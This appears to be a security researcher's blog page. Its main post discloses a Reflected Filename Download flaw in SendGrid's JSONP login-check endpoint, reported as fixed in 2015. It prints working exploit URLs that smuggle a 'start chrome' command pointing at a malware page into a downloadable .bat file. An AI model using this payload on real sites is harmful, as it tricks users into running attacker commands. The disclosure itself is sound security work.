Got some cool gifts from Edmodo. Always glad to help others to improve their security 🙂
Got some cool gifts from Edmodo. Always glad to help others to improve their security 🙂
For those who don’t know who SendGrid is…
SendGrid provides unmatched deliverability, scalability, and reliability. We deliver email on behalf of happy customers such as: Airbnb, Foursquare, Spotify and Uber.
They send over 19 billion emails per month.
When visiting their site I noticed a XHR request on my Google Inspector that caught my attention:
https://sendgrid.com/user/checkLogin?callback=mycallback&callback=jQuery171016384647646918893_1439389801565
&_=1439389801826
Which returned the following JSON information:
/**/jQuery171016384647646918893_1439389801565({“status”:”success”,”logged_in”
:false});
I noticed that the callback was called on the URL so I decided to inject my RFD vector:
https://sendgrid.com/user/checkLogin?callback=mycallback&callback=||start chrome websegura.net/malware.htm||
Reflecting:
/**/||start chrome websegura.net/malware.htm||({“status”:”success”,”logged_in”:false});
Now that I could reflect my payload and removed the variables that don’t do anything on my proof-of-concept and try to manipulate the filename without giving a HTTP error:
https://sendgrid.com/user/checkLogin/freecoupons.bat?&callback=||start chrome websegura.net/malware.htm||
For Internet Explorer 8 and 9 you didn’t need anything else.
If you run this last URL it would automatically try to download freecoupons.bat file from sendgrid.com servers.
On other modern browsers you needed the HTML5 download attribute.
The download would start just by clicking the image.
A malicious user could:
SendGrid were always on top of the issue [cool guys] and they were nice enough to send me a awesome t-shirt 🙂
Timeline:
12-08-2015 Reported this security issue to SendGrid
20-08-2015 SendGrid replied that was fixing the issue
29-09-2015 Asked for a update
27-10-2015 SendGrid reported that the issue is fixed
I would like to thank Cobalt.io team for the gift pack they sent me.
Working with them it’s awesome and I hope to keep helping and growing with you guys.
PS: Nice to be a Ace of Diamonds 🙂
Cheers!
When I help companies to fix security issues I do not ask anything in return.
I come across a security issue on Mixpanel when auditing private client on Cobalt.io and I send to Mixpanel a little security advisory describing a Reflected Filename Download vulnerability with a couple of screenshots.
Mixpanel security team fixed the vulnerability very fast showing that they care about security.